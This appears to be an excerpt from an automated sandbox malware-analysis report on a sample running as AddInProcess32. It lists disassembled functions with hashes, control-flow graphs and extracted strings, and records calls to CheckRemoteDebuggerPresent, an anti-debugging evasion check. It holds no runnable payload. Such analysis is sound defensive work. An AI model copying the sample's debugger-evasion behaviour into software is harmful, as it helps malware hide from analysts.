                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq
                                                • API String ID: 0-3550614674
                                                • Opcode ID: 51bb0f1b6cc45779ba21cf10d63de9bc5f3165179b248a015ca1188ad4be3b2e
                                                • Instruction ID: 286d44a4b8fe160ada3cf32613d8460c670af6c7718881005062e21435f520da
                                                • Opcode Fuzzy Hash: 51bb0f1b6cc45779ba21cf10d63de9bc5f3165179b248a015ca1188ad4be3b2e
                                                • Instruction Fuzzy Hash: 8F02AE70B002068FDB54EF65DA906AEB7E2FF84310F648529D415DB398EB34ED86CB90
                                                Function 06A731F8 Relevance: 2.3, Instructions: 2313COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0365089b1e6870493ad65779f5f8ebe8536b2f9db1d8b9d22764ddf4a9a0343
                                                • Instruction ID: 5fab112fd0e46592cca08eab9fdf2cf76a8f80cfc7f66cd3f845b52eb1b4b832
                                                • Opcode Fuzzy Hash: c0365089b1e6870493ad65779f5f8ebe8536b2f9db1d8b9d22764ddf4a9a0343
                                                • Instruction Fuzzy Hash: C0331031D107198ECB15EF68C8846A9F7B1FF99300F15C79AD458AB225EB70EAC5CB81
                                                Function 02CA7E88 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2374 2ca7e88-2ca7f0c CheckRemoteDebuggerPresent 2376 2ca7f0e-2ca7f14 2374->2376 2377 2ca7f15-2ca7f50 2374->2377 2376->2377
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02CA7EFF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4171292171.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2ca0000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: f93ab0d19d207f2b2411b19c78a814850f059f2ac9c2388d78d380b71f451556
                                                • Instruction ID: 8b99da5111675a047206f694d8f522cae107c783147bb36ab5de91871daf2990
                                                • Opcode Fuzzy Hash: f93ab0d19d207f2b2411b19c78a814850f059f2ac9c2388d78d380b71f451556
                                                • Instruction Fuzzy Hash: B52148B18002598FCB10CF9AD844BEEFBF4AF48324F14846AE458A3350D738AA44CF64
                                                Function 06A787F0 Relevance: .6, Instructions: 586COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad40ffe65b96ff62140ce8a1371d80d1bd15e4713c82f4f6cc4f2d85d3aa9345
                                                • Instruction ID: 7b30a4ff4fb18c3a943fc065335d48ef2ed9d1316a0cd5293d08f860210674fb
                                                • Opcode Fuzzy Hash: ad40ffe65b96ff62140ce8a1371d80d1bd15e4713c82f4f6cc4f2d85d3aa9345
                                                • Instruction Fuzzy Hash: 1412B175F002058FDB64EB64C98466EBBB2EF85310F24887AD8169F395DB38EC45CB90
                                                Function 06A7E850 Relevance: .6, Instructions: 580COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d69a7ea519b74e9e2f48def14d05a32d65215b72f578e06ff09004576967e74a
                                                • Instruction ID: 264963c95ea65817428fc1f2d8a204de639faf85d60f6625980a344e314c99dd
                                                • Opcode Fuzzy Hash: d69a7ea519b74e9e2f48def14d05a32d65215b72f578e06ff09004576967e74a
                                                • Instruction Fuzzy Hash: 82227330E102099FDF64EB68D9807AEBBB6FB85310F248866E415EF395DB35DC818B51
                                                Function 06A7F7B0 Relevance: .5, Instructions: 495COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1633a302c6cd9d8d5bc8ab6494a6d54affd92cbdd253ab74b99193657a3e67b
                                                • Instruction ID: 4fc57008a4e9d41f1736ae189a41b06662f1f55fc8c494c1aa8f6729fe3e808f
                                                • Opcode Fuzzy Hash: b1633a302c6cd9d8d5bc8ab6494a6d54affd92cbdd253ab74b99193657a3e67b
                                                • Instruction Fuzzy Hash: 60028B35A10205DFDB64EF68D990BAEB7B2EB88310F108525E815DB399DB34ED85CB90
                                                Function 06A7E2E8 Relevance: 10.4, Strings: 8, Instructions: 388COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 6a7e2e8-6a7e306 1 6a7e308-6a7e30b 0->1 2 6a7e505-6a7e50e 1->2 3 6a7e311-6a7e314 1->3 6 6a7e514-6a7e51e 2->6 7 6a7e350-6a7e359 2->7 4 6a7e337-6a7e33a 3->4 5 6a7e316-6a7e332 3->5 10 6a7e33c-6a7e340 4->10 11 6a7e34b-6a7e34e 4->11 5->4 8 6a7e51f-6a7e556 7->8 9 6a7e35f-6a7e363 7->9 21 6a7e558-6a7e55b 8->21 12 6a7e368-6a7e36b 9->12 10->6 14 6a7e346 10->14 11->7 11->12 15 6a7e37f-6a7e382 12->15 16 6a7e36d-6a7e37a 12->16 14->11 18 6a7e384-6a7e397 15->18 19 6a7e39c-6a7e39f 15->19 16->15 18->19 23 6a7e3a1-6a7e3a6 19->23 24 6a7e3a9-6a7e3ac 19->24 25 6a7e55d-6a7e561 21->25 26 6a7e568-6a7e56b 21->26 23->24 30 6a7e3ae-6a7e3b7 24->30 31 6a7e3bc-6a7e3be 24->31 32 6a7e563 25->32 33 6a7e581-6a7e5bc 25->33 27 6a7e56d-6a7e577 26->27 28 6a7e578-6a7e57b 26->28 28->33 34 6a7e7e4-6a7e7e7 28->34 30->31 35 6a7e3c5-6a7e3c8 31->35 36 6a7e3c0 31->36 32->26 41 6a7e5c2-6a7e5ce 33->41 42 6a7e7af-6a7e7c2 33->42 39 6a7e80a-6a7e80d 34->39 40 6a7e7e9-6a7e805 34->40 35->1 37 6a7e3ce-6a7e3f2 35->37 36->35 58 6a7e502 37->58 59 6a7e3f8-6a7e407 37->59 43 6a7e80f 39->43 44 6a7e81c-6a7e81e 39->44 40->39 53 6a7e5d0-6a7e5e9 41->53 54 6a7e5ee-6a7e632 41->54 48 6a7e7c4 42->48 124 6a7e80f call 6a7e840 43->124 125 6a7e80f call 6a7e850 43->125 45 6a7e825-6a7e828 44->45 46 6a7e820 44->46 45->21 51 6a7e82e-6a7e838 45->51 46->45 56 6a7e7c5 48->56 52 6a7e815-6a7e817 52->44 53->48 74 6a7e634-6a7e646 54->74 75 6a7e64e-6a7e68d 54->75 56->56 58->2 62 6a7e41f-6a7e45a call 6a797b8 59->62 63 6a7e409-6a7e40f 59->63 84 6a7e472-6a7e489 62->84 85 6a7e45c-6a7e462 62->85 65 6a7e413-6a7e415 63->65 66 6a7e411 63->66 65->62 66->62 74->75 80 6a7e774-6a7e789 75->80 81 6a7e693-6a7e76e call 6a797b8 75->81 80->42 81->80 93 6a7e4a1-6a7e4b2 84->93 94 6a7e48b-6a7e491 84->94 86 6a7e466-6a7e468 85->86 87 6a7e464 85->87 86->84 87->84 100 6a7e4b4-6a7e4ba 93->100 101 6a7e4ca-6a7e4fb 93->101 96 6a7e495-6a7e497 94->96 97 6a7e493 94->97 96->93 97->93 103 6a7e4be-6a7e4c0 100->103 104 6a7e4bc 100->104 101->58 103->101 104->101 124->52 125->52
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                • API String ID: 0-1078448309
                                                • Opcode ID: fa9a3dbb2e8f99783ea790765d2915d1c786a16eb046eea4f433806207475dce
                                                • Instruction ID: e0262d371aaf27a17a949fdc96a92d625b44f768c768f10e256c959177da168b
                                                • Opcode Fuzzy Hash: fa9a3dbb2e8f99783ea790765d2915d1c786a16eb046eea4f433806207475dce
                                                • Instruction Fuzzy Hash: C0E16E31E1020A8FDB65EF69D9906AEB7B2FF84304F208569D405AB355EB35DC46CB90
                                                Function 06A7C768 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 573 6a7c768-6a7c78d 574 6a7c78f-6a7c792 573->574 575 6a7c794-6a7c7b3 574->575 576 6a7c7b8-6a7c7bb 574->576 575->576 577 6a7c7c1-6a7c7d6 576->577 578 6a7d07b-6a7d07d 576->578 585 6a7c7ee-6a7c804 577->585 586 6a7c7d8-6a7c7de 577->586 580 6a7d084-6a7d087 578->580 581 6a7d07f 578->581 580->574 583 6a7d08d-6a7d097 580->583 581->580 590 6a7c80f-6a7c811 585->590 587 6a7c7e2-6a7c7e4 586->587 588 6a7c7e0 586->588 587->585 588->585 591 6a7c813-6a7c819 590->591 592 6a7c829-6a7c89a 590->592 593 6a7c81d-6a7c81f 591->593 594 6a7c81b 591->594 603 6a7c8c6-6a7c8e2 592->603 604 6a7c89c-6a7c8bf 592->604 593->592 594->592 609 6a7c8e4-6a7c907 603->609 610 6a7c90e-6a7c929 603->610 604->603 609->610 615 6a7c954-6a7c96f 610->615 616 6a7c92b-6a7c94d 610->616 621 6a7c971-6a7c993 615->621 622 6a7c99a-6a7c9a4 615->622 616->615 621->622 623 6a7c9a6-6a7c9af 622->623 624 6a7c9b4-6a7ca2e 622->624 623->583 630 6a7ca30-6a7ca4e 624->630 631 6a7ca7b-6a7ca90 624->631 635 6a7ca50-6a7ca5f 630->635 636 6a7ca6a-6a7ca79 630->636 631->578 635->636 636->630 636->631
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq
                                                • API String ID: 0-2881790790
                                                • Opcode ID: 96079f638e89e9dec810152e511fe7475bf757135b1c2a6acdc73249b458ffdd
                                                • Instruction ID: 8975b7f58f2ba003d078c90e810b9f30e352e40a232eef4f7ae5f235fb627cca
                                                • Opcode Fuzzy Hash: 96079f638e89e9dec810152e511fe7475bf757135b1c2a6acdc73249b458ffdd
                                                • Instruction Fuzzy Hash: 39914D71F0020A8FDF64EF65D9507AEB7B6EF84250F508569C40AEB358EB31ED468B90
                                                Function 06A77DC0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1052 6a77dc0-6a77de4 1053 6a77de6-6a77de9 1052->1053 1054 6a77deb-6a77e05 1053->1054 1055 6a77e0a-6a77e0d 1053->1055 1054->1055 1056 6a77e13-6a77f0b 1055->1056 1057 6a784ec-6a784ee 1055->1057 1075 6a77f11-6a77f59 1056->1075 1076 6a77f8e-6a77f95 1056->1076 1059 6a784f5-6a784f8 1057->1059 1060 6a784f0 1057->1060 1059->1053 1062 6a784fe-6a7850b 1059->1062 1060->1059 1098 6a77f5e call 6a78668 1075->1098 1099 6a77f5e call 6a78678 1075->1099 1077 6a77f9b-6a7800b 1076->1077 1078 6a78019-6a78022 1076->1078 1095 6a78016 1077->1095 1096 6a7800d 1077->1096 1078->1062 1089 6a77f64-6a77f80 1092 6a77f82 1089->1092 1093 6a77f8b-6a77f8c 1089->1093 1092->1093 1093->1076 1095->1078 1096->1095 1098->1089 1099->1089
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fpq$XPpq$\Opq
                                                • API String ID: 0-2571271785
                                                • Opcode ID: 1329519e0e940e83f13ead5ecef81a4ce2888c9e0f95072c8c31e5011a0d2a99
                                                • Instruction ID: f8349bc6e55e66ea1dc4fea2c52ef9b641089f98c45ce9741abbea30de00ba78
                                                • Opcode Fuzzy Hash: 1329519e0e940e83f13ead5ecef81a4ce2888c9e0f95072c8c31e5011a0d2a99
                                                • Instruction Fuzzy Hash: AC616F35F102099FEB54ABA4C9547AEBAF6FF88300F208029E506AB395DF759C458B90
                                                Function 06A7C759 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1821 6a7c759-6a7c78d 1822 6a7c78f-6a7c792 1821->1822 1823 6a7c794-6a7c7b3 1822->1823 1824 6a7c7b8-6a7c7bb 1822->1824 1823->1824 1825 6a7c7c1-6a7c7d6 1824->1825 1826 6a7d07b-6a7d07d 1824->1826 1833 6a7c7ee-6a7c804 1825->1833 1834 6a7c7d8-6a7c7de 1825->1834 1828 6a7d084-6a7d087 1826->1828 1829 6a7d07f 1826->1829 1828->1822 1831 6a7d08d-6a7d097 1828->1831 1829->1828 1838 6a7c80f-6a7c811 1833->1838 1835 6a7c7e2-6a7c7e4 1834->1835 1836 6a7c7e0 1834->1836 1835->1833 1836->1833 1839 6a7c813-6a7c819 1838->1839 1840 6a7c829-6a7c89a 1838->1840 1841 6a7c81d-6a7c81f 1839->1841 1842 6a7c81b 1839->1842 1851 6a7c8c6-6a7c8e2 1840->1851 1852 6a7c89c-6a7c8bf 1840->1852 1841->1840 1842->1840 1857 6a7c8e4-6a7c907 1851->1857 1858 6a7c90e-6a7c929 1851->1858 1852->1851 1857->1858 1863 6a7c954-6a7c96f 1858->1863 1864 6a7c92b-6a7c94d 1858->1864 1869 6a7c971-6a7c993 1863->1869 1870 6a7c99a-6a7c9a4 1863->1870 1864->1863 1869->1870 1871 6a7c9a6-6a7c9af 1870->1871 1872 6a7c9b4-6a7ca2e 1870->1872 1871->1831 1878 6a7ca30-6a7ca4e 1872->1878 1879 6a7ca7b-6a7ca90 1872->1879 1883 6a7ca50-6a7ca5f 1878->1883 1884 6a7ca6a-6a7ca79 1878->1884 1879->1826 1883->1884 1884->1878 1884->1879
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq
                                                • API String ID: 0-3550614674
                                                • Opcode ID: 3339fd5d2716f856f7fe5eee9c0722a2693b5d12ff91eb0ed0a7aa2d6571b3de
                                                • Instruction ID: 3289239b5b7212534b0a2da89ab3e7d0658d7493b778feacddf5826eb4866628
                                                • Opcode Fuzzy Hash: 3339fd5d2716f856f7fe5eee9c0722a2693b5d12ff91eb0ed0a7aa2d6571b3de
                                                • Instruction Fuzzy Hash: FC514F75B002068FDF94EB75D95076E77F6EB84650F50886AC40ADB399EB31DC428B90
                                                Function 06A77DB0 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1887 6a77db0-6a77de4 1888 6a77de6-6a77de9 1887->1888 1889 6a77deb-6a77e05 1888->1889 1890 6a77e0a-6a77e0d 1888->1890 1889->1890 1891 6a77e13-6a77f0b 1890->1891 1892 6a784ec-6a784ee 1890->1892 1910 6a77f11-6a77f59 1891->1910 1911 6a77f8e-6a77f95 1891->1911 1894 6a784f5-6a784f8 1892->1894 1895 6a784f0 1892->1895 1894->1888 1897 6a784fe-6a7850b 1894->1897 1895->1894 1933 6a77f5e call 6a78668 1910->1933 1934 6a77f5e call 6a78678 1910->1934 1912 6a77f9b-6a7800b 1911->1912 1913 6a78019-6a78022 1911->1913 1930 6a78016 1912->1930 1931 6a7800d 1912->1931 1913->1897 1924 6a77f64-6a77f80 1927 6a77f82 1924->1927 1928 6a77f8b-6a77f8c 1924->1928 1927->1928 1928->1911 1930->1913 1931->1930 1933->1924 1934->1924
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fpq$XPpq
                                                • API String ID: 0-1280283
                                                • Opcode ID: 756382b1fa596786d998ae5964a6b28beb6185d3b053934ba9856686a1324b9d
                                                • Instruction ID: 4d57655f194b62ab815ea543bf58441c9c3dd553d4d8c1d6813e67b5bbffb396
                                                • Opcode Fuzzy Hash: 756382b1fa596786d998ae5964a6b28beb6185d3b053934ba9856686a1324b9d
                                                • Instruction Fuzzy Hash: 15516074F102099FEB54ABA4C9547AEBBF7BF88300F208529E506AB395DB748C41CB90
                                                Function 02CA7E81 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2367 2ca7e81-2ca7f0c CheckRemoteDebuggerPresent 2370 2ca7f0e-2ca7f14 2367->2370 2371 2ca7f15-2ca7f50 2367->2371 2370->2371
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02CA7EFF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4171292171.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2ca0000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: 60f362ec5f3d97c689ea8315ef56b8efc5cc445daf853e0513b51e05fa3f7d91
                                                • Instruction ID: 3486b800858d459567b96b5418145eb183c4682caa7b5c0b5e3e634fcf482185
                                                • Opcode Fuzzy Hash: 60f362ec5f3d97c689ea8315ef56b8efc5cc445daf853e0513b51e05fa3f7d91
                                                • Instruction Fuzzy Hash: 932139B1800259CFCB10CF99D884BEEFBF4AF48314F14846AE455A3351D738AA44CF64
                                                Function 06A75815 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHkq
                                                • API String ID: 0-902561536
                                                • Opcode ID: 9bc9553fe245834a87d6d9177d366b46a5c2c3eb07b6284f518b440d2b45cc75
                                                • Instruction ID: 40f384353e6bf8982f510b4f40db5bb57ce7f2ad2f0c944d7c13dd13ee45a42c
                                                • Opcode Fuzzy Hash: 9bc9553fe245834a87d6d9177d366b46a5c2c3eb07b6284f518b440d2b45cc75
                                                • Instruction Fuzzy Hash: 4131D035F002058FDB58AB74CA5426E7BA2FF89250F244568D402DB398EF34DC86CB90
                                                Function 06A75828 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHkq
                                                • API String ID: 0-902561536
                                                • Opcode ID: dd7754ee9d838d44205df682c9c3055f76283d57344f8cf9452be4e3295185ee
                                                • Instruction ID: c79ecccaef162cd3f18b4cdeccf5d1e55bb6de3abc7a538efe53b0452635402a
                                                • Opcode Fuzzy Hash: dd7754ee9d838d44205df682c9c3055f76283d57344f8cf9452be4e3295185ee
                                                • Instruction Fuzzy Hash: B631AD71F002058FDB58AB74DA5426F7AA7EB89250F244528D406EB399EF35DC46CB90
                                                Function 06A79808 Relevance: .6, Instructions: 558COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 302ddb3df7a76096287e7d1dd868b717a2003d946776ffbdf3918ac60b0a230e
                                                • Instruction ID: 0bb5c51bf8d84b3729410d3130f85dd0a737e49660c609b4b1a0b321297f1d9c
                                                • Opcode Fuzzy Hash: 302ddb3df7a76096287e7d1dd868b717a2003d946776ffbdf3918ac60b0a230e
                                                • Instruction Fuzzy Hash: 17127F35B102058FDF54EB68D9906AEB7F6EF88310F24846AE406DB395DB35ED42CB90
                                                Function 06A797F8 Relevance: .3, Instructions: 310COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b5ccc34308856ebce8c068231cfdfb4e6d4ad5b89113da3a5dd38b573c65ebde
                                                • Instruction ID: c1bad7f506e2c2c958f2654a70bf03e305cf7dfc04989f1acb190bcfd814c3a9
                                                • Opcode Fuzzy Hash: b5ccc34308856ebce8c068231cfdfb4e6d4ad5b89113da3a5dd38b573c65ebde
                                                • Instruction Fuzzy Hash: 8FC13035E101058FDF54EB68D990AAEBBF6EF88310F648426D805DB365DB35ED42CB50
                                                Function 06A7E840 Relevance: .3, Instructions: 296COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 89b0b1650a5d7fc99c3550cd7b6c6fc505a096dedddadd7f59077828a2e58839
                                                • Instruction ID: d7be2e7c7107bfcfc44bd8bb7bd5d6d782b2021b6fc9358014bb0ac517d1efcb
                                                • Opcode Fuzzy Hash: 89b0b1650a5d7fc99c3550cd7b6c6fc505a096dedddadd7f59077828a2e58839
                                                • Instruction Fuzzy Hash: CAA19674F002098FEF64EB6CC9907AEBBB6FB89310F208865D405EB395DA35DC818751
                                                Function 06A7A328 Relevance: .3, Instructions: 257COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc2f198fc40464a4febdcf8c6ea286c922e8e57f1a59cb459009019888f420a1
                                                • Instruction ID: a565407615b841895085f1fdc1082da3618114d732df6352f0b4199826fa564e
                                                • Opcode Fuzzy Hash: cc2f198fc40464a4febdcf8c6ea286c922e8e57f1a59cb459009019888f420a1
                                                • Instruction Fuzzy Hash: B5A17B34A00204EFCB64EF68DA44B6DBBF2EF84314F548569E51AAB354DB35ED85CB80
                                                Function 06A79408 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0da1ee56ee5e3791ea82526722230dcfa14b2567245e23fc4af3b3f67140a48
                                                • Instruction ID: b19e5e88454aaf61b89181e7f3ee495a517edc21322d07b134a021e96c0b8d05
                                                • Opcode Fuzzy Hash: d0da1ee56ee5e3791ea82526722230dcfa14b2567245e23fc4af3b3f67140a48
                                                • Instruction Fuzzy Hash: 6C61C1B2F001114FDF55AB7DCC8066FAAEBAF94620B54443AE80ADB379DE65DC0287C1
                                                Function 06A774F0 Relevance: .2, Instructions: 225COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00a4d3fdcad253fc98dd652bea70a4babed5c2d9dd3f48709633a55ddc8823f6
                                                • Instruction ID: 85a07e08a8a4a1f56e0753647bf45066da649f3ac61fa77ce145f2577e43c022
                                                • Opcode Fuzzy Hash: 00a4d3fdcad253fc98dd652bea70a4babed5c2d9dd3f48709633a55ddc8823f6
                                                • Instruction Fuzzy Hash: DD811C75B102098FDF54EF69D9547AEB7B6EB84300F208469D40ADB398EF34DC428B91
                                                Function 06A77814 Relevance: .2, Instructions: 219COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f79de83cfe6f2e0bea32d1b5305fa198094e1467d43c11db8b196aa170f0da1
                                                • Instruction ID: 1c1e9c2a391278f5725c58f3154082fdf884cebe74ed24e255878cf13e554d99
                                                • Opcode Fuzzy Hash: 1f79de83cfe6f2e0bea32d1b5305fa198094e1467d43c11db8b196aa170f0da1
                                                • Instruction Fuzzy Hash: CE913A34E1061A8FDF60DF68C890B9DB7B1FF89310F208599D549AB295DB70AE85CF90
                                                Function 06A77500 Relevance: .2, Instructions: 218COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6e6a455f90731311fe73aa17d88ac5cbb483282781c9f93627d3b42e643ded9
                                                • Instruction ID: 89861363ed73e1a3597a91ae6dc1f1f0ead6cb369f8639b81b1ed9a7a275fe2f
                                                • Opcode Fuzzy Hash: d6e6a455f90731311fe73aa17d88ac5cbb483282781c9f93627d3b42e643ded9
                                                • Instruction Fuzzy Hash: 87811D35B102098FDF54EF69D95466EB7B6EB84300F108469D40ADB398EF74EC468B91
                                                Function 06A77828 Relevance: .2, Instructions: 210COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c036d94983dfb94b4fdbee4b7f7e56924e7c7dcda9a82591a47b4b65a3de3cbd
                                                • Instruction ID: 16a9e6dc39a1c9cdc4c0c94fb47cd5988813f8d343e776d24f1d72246da8e5da
